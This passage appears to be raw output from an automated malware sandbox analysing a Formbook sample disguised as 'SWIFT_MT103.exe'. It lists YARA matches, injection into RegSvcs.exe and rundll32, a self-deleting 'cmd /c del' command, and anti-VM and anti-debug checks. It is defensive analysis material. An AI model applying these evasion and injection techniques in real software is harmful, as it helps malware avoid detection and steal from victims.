          Source: 00000015.00000002.465035906.0000000000250000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000015.00000002.467645501.0000000004190000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000015.00000002.467645501.0000000004190000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000015.00000002.467412388.00000000029C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000015.00000002.467412388.00000000029C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.358413416.0000000001130000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.358413416.0000000001130000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: SWIFT_MT103.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@4/1
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SWIFT_MT103.exe.logJump to behavior
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeMutant created: \Sessions\1\BaseNamedObjects\zrGjTcAomDDY
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5428:120:WilError_01
          Source: SWIFT_MT103.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
          Source: SWIFT_MT103.exeMetadefender: Detection: 31%
          Source: SWIFT_MT103.exeReversingLabs: Detection: 78%
          Source: unknownProcess created: C:\Users\user\Desktop\SWIFT_MT103.exe 'C:\Users\user\Desktop\SWIFT_MT103.exe'
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe {path}
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe {path}
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: SWIFT_MT103.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: SWIFT_MT103.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: SWIFT_MT103.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 0000000E.00000000.349194222.0000000006300000.00000002.00000001.sdmp
          Source: Binary string: RegSvcs.pdb, source: rundll32.exe, 00000015.00000002.470769360.0000000004907000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 0000000B.00000002.358812103.000000000170F000.00000040.00000001.sdmp, rundll32.exe, 00000015.00000002.468350002.00000000044EF000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: RegSvcs.exe, rundll32.exe
          Source: Binary string: rundll32.pdb source: RegSvcs.exe, 0000000B.00000002.359138151.0000000001920000.00000040.00000001.sdmp
          Source: Binary string: rundll32.pdbGCTL source: RegSvcs.exe, 0000000B.00000002.359138151.0000000001920000.00000040.00000001.sdmp
          Source: Binary string: RegSvcs.pdb source: rundll32.exe, 00000015.00000002.470769360.0000000004907000.00000004.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 0000000E.00000000.349194222.0000000006300000.00000002.00000001.sdmp

          Data Obfuscation:

          barindex
          .NET source code contains potential unpackerShow sources
          Source: SWIFT_MT103.exe, CustomTabControl/Form1.cs.Net Code: X_123123454363 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 0.0.SWIFT_MT103.exe.690000.0.unpack, CustomTabControl/Form1.cs.Net Code: X_123123454363 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 0.2.SWIFT_MT103.exe.690000.0.unpack, CustomTabControl/Form1.cs.Net Code: X_123123454363 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: SWIFT_MT103.exeStatic PE information: 0x9CA2CF99 [Thu Apr 10 16:34:33 2053 UTC]
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeCode function: 0_2_087B54A2 push esi; iretd
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeCode function: 0_2_087BDF32 push dword ptr [ebx+ebp-75h]; iretd
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_004161E2 push ecx; iretd
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_0041C309 pushfd ; iretd
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_0041B3C5 push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_0041B47C push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_0041B412 push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_0041B41B push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_00415F53 pushfd ; iretd
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_004157CE push edi; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_00415F93 pushfd ; iretd
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_0166D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_0444D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_029DB3C5 push eax; ret
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_029DC309 pushfd ; iretd
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_029D61E2 push ecx; iretd
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_029D5F93 pushfd ; iretd
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_029D57CE push edi; ret
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_029D5F53 pushfd ; iretd
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_029DB41B push eax; ret
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_029DB412 push eax; ret
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_029DB47C push eax; ret
          Source: initial sampleStatic PE information: section name: .text entropy: 7.83042762199
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM3Show sources
          Source: Yara matchFile source: Process Memory Space: SWIFT_MT103.exe PID: 720, type: MEMORYSTR
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: SWIFT_MT103.exe, 00000000.00000002.292259160.0000000002A91000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
          Source: SWIFT_MT103.exe, 00000000.00000002.292259160.0000000002A91000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeRDTSC instruction interceptor: First address: 00000000004085F4 second address: 00000000004085FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeRDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\rundll32.exeRDTSC instruction interceptor: First address: 00000000029C85F4 second address: 00000000029C85FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\rundll32.exeRDTSC instruction interceptor: First address: 00000000029C898E second address: 00000000029C8994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_004088C0 rdtsc
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\SWIFT_MT103.exe TID: 4112Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeThread delayed: delay time: 922337203685477
          Source: explorer.exe, 0000000E.00000000.323150474.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 0000000E.00000000.323150474.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
          Source: SWIFT_MT103.exe, 00000000.00000002.292259160.0000000002A91000.00000004.00000001.sdmpBinary or memory string: VMware SVGA IIOData Source=localhost\sqlexpress;Initial Catalog=dbSMS;Integrated Security=True
          Source: explorer.exe, 0000000E.00000000.322094574.0000000008220000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 0000000E.00000000.322702703.0000000008640000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: SWIFT_MT103.exe, 00000000.00000002.292259160.0000000002A91000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: SWIFT_MT103.exe, 00000000.00000002.292259160.0000000002A91000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: SWIFT_MT103.exe, 00000000.00000002.292259160.0000000002A91000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
          Source: explorer.exe, 0000000E.00000000.314193876.00000000055D0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
          Source: SWIFT_MT103.exe, 00000000.00000002.292259160.0000000002A91000.00000004.00000001.sdmpBinary or memory string: VMWARE
          Source: explorer.exe, 0000000E.00000000.323150474.000000000871F000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
          Source: explorer.exe, 0000000E.00000000.323150474.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 0000000E.00000000.323300831.00000000087D1000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00ices
          Source: explorer.exe, 0000000E.00000000.314257234.0000000005603000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
          Source: SWIFT_MT103.exe, 00000000.00000002.292259160.0000000002A91000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 0000000E.00000000.323931222.0000000008907000.00000004.00000001.sdmpBinary or memory string: _VMware_SATA_CD00#5&q
          Source: explorer.exe, 0000000E.00000000.322094574.0000000008220000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 0000000E.00000000.322094574.0000000008220000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: SWIFT_MT103.exe, 00000000.00000002.292259160.0000000002A91000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
          Source: SWIFT_MT103.exe, 00000000.00000002.292259160.0000000002A91000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
          Source: SWIFT_MT103.exe, 00000000.00000002.292259160.0000000002A91000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
          Source: explorer.exe, 0000000E.00000000.322094574.0000000008220000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeProcess information queried: ProcessInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPort
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_004088C0 rdtsc
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_00409B30 LdrLoadDll,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_0161C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_0161B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_0161B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_0163B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_0163B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01634120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01634120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01634120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01634120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01634120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_0164513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_0164513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01619100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01619100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01619100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_0161B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_0161B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_0161B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_016A41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_016461A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_016461A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_016969A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_016951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_016951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_016951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_016951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_0164A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_0163C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01642990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_016E1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_016D2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01630050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01630050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_0162B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_0162B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_0162B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_0162B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_0164002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_0164002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_0164002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_0164002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_0164002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_016E4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_016E4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01697016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01697016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_01697016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_016158EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_016AB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_016AB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_016AB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_016AB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_016AB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_016AB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_016420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_016420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_016420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_016420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_016420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_016420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_016590AF mov eax, dword ptr fs:[00000030h]
